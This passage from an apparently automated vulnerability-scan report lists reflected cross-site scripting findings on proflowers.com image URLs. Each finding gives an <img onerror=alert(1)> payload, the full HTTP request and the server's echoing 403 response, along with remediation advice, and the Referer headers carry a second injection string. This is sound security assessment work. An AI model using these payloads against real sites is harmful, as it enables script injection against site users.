The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload 312d2<img%20src%3da%20onerror%3dalert(1)>4ee798bbca6 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 312d2<img src=a onerror=alert(1)>4ee798bbca6 in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ312d2<img%20src%3da%20onerror%3dalert(1)>4ee798bbca6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:26 GMT
Connection: close

Unable to find /ProvideCommerce/M519BRR1001210_SQ312d2<img src=a onerror=alert(1)>4ee798bbca6

4.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload 664e8<img%20src%3da%20onerror%3dalert(1)>005d15718af was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 664e8<img src=a onerror=alert(1)>005d15718af in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF664e8<img%20src%3da%20onerror%3dalert(1)>005d15718af?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:49 GMT
Connection: close

Unable to find /ProvideCommerce/MBQ15orchpurp10_PF664e8<img src=a onerror=alert(1)>005d15718af

4.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload 613be<img%20src%3da%20onerror%3dalert(1)>a8ba2d3b6ff was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 613be<img src=a onerror=alert(1)>a8ba2d3b6ff in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF613be<img%20src%3da%20onerror%3dalert(1)>a8ba2d3b6ff?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:00 GMT
Connection: close

Unable to find /ProvideCommerce/MBQallthefrills_pnk11_PF613be<img src=a onerror=alert(1)>a8ba2d3b6ff

4.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload dc33a<img%20src%3da%20onerror%3dalert(1)>e55e170119a was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as dc33a<img src=a onerror=alert(1)>e55e170119a in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PFdc33a<img%20src%3da%20onerror%3dalert(1)>e55e170119a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:57 GMT
Connection: close

Unable to find /ProvideCommerce/MBQassrtgerb_coralpeony11_PFdc33a<img src=a onerror=alert(1)>e55e170119a

4.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload a266c<img%20src%3da%20onerror%3dalert(1)>f1cc77c07c5 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as a266c<img src=a onerror=alert(1)>f1cc77c07c5 in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PFa266c<img%20src%3da%20onerror%3dalert(1)>f1cc77c07c5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQassrtmums11_catalog_PFa266c<img src=a onerror=alert(1)>f1cc77c07c5

4.51. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload 8217f<img%20src%3da%20onerror%3dalert(1)>bd7ea8ed212 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 8217f<img src=a onerror=alert(1)>bd7ea8ed212 in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF8217f<img%20src%3da%20onerror%3dalert(1)>bd7ea8ed212?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:48 GMT
Connection: close

Unable to find /ProvideCommerce/MBQcarnival10_PF8217f<img src=a onerror=alert(1)>bd7ea8ed212

4.52. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload fe029<img%20src%3da%20onerror%3dalert(1)>0534e1dcbe6 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as fe029<img src=a onerror=alert(1)>0534e1dcbe6 in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PFfe029<img%20src%3da%20onerror%3dalert(1)>0534e1dcbe6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:27 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxhugskiss_rbyg11_PFfe029<img src=a onerror=alert(1)>0534e1dcbe6

4.53. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload e3e3e<img%20src%3da%20onerror%3dalert(1)>91af06a583c was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as e3e3e<img src=a onerror=alert(1)>91af06a583c in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PFe3e3e<img%20src%3da%20onerror%3dalert(1)>91af06a583c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:14 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxjoyfulbouquet09_PFe3e3e<img src=a onerror=alert(1)>91af06a583c

4.54. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload cd0b9<img%20src%3da%20onerror%3dalert(1)>27b564570ad was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as cd0b9<img src=a onerror=alert(1)>27b564570ad in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PFcd0b9<img%20src%3da%20onerror%3dalert(1)>27b564570ad?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:10 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxpinksapp_pnk10_2_PFcd0b9<img src=a onerror=alert(1)>27b564570ad

4.55. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload fbefa<img%20src%3da%20onerror%3dalert(1)>c7f3acc65e was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as fbefa<img src=a onerror=alert(1)>c7f3acc65e in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PFfbefa<img%20src%3da%20onerror%3dalert(1)>c7f3acc65e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:04 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PFfbefa<img src=a onerror=alert(1)>c7f3acc65e

4.56. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload 30a26<img%20src%3da%20onerror%3dalert(1)>47859c8e565 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 30a26<img src=a onerror=alert(1)>47859c8e565 in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF30a26<img%20src%3da%20onerror%3dalert(1)>47859c8e565?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF30a26<img src=a onerror=alert(1)>47859c8e565

4.57. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload 1a7b7<img%20src%3da%20onerror%3dalert(1)>259093f2a2b was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 1a7b7<img src=a onerror=alert(1)>259093f2a2b in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF1a7b7<img%20src%3da%20onerror%3dalert(1)>259093f2a2b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:02 GMT
Connection: close

Unable to find /ProvideCommerce/MBQgardenbouquet_grn11_PF1a7b7<img src=a onerror=alert(1)>259093f2a2b

4.58. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload 3114b<img%20src%3da%20onerror%3dalert(1)>5b9724d6225 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 3114b<img src=a onerror=alert(1)>5b9724d6225 in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF3114b<img%20src%3da%20onerror%3dalert(1)>5b9724d6225?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:53 GMT
Connection: close

Unable to find /ProvideCommerce/MBQhugskisses_rbye11_PF3114b<img src=a onerror=alert(1)>5b9724d6225

4.59. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload 3134b<img%20src%3da%20onerror%3dalert(1)>0eff80005ad was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 3134b<img src=a onerror=alert(1)>0eff80005ad in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF3134b<img%20src%3da%20onerror%3dalert(1)>0eff80005ad?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/MBQjoyfulbouquet_pnk10_PF3134b<img src=a onerror=alert(1)>0eff80005ad

4.60. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload cb531<img%20src%3da%20onerror%3dalert(1)>8866ce5e065 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as cb531<img src=a onerror=alert(1)>8866ce5e065 in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PFcb531<img%20src%3da%20onerror%3dalert(1)>8866ce5e065?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
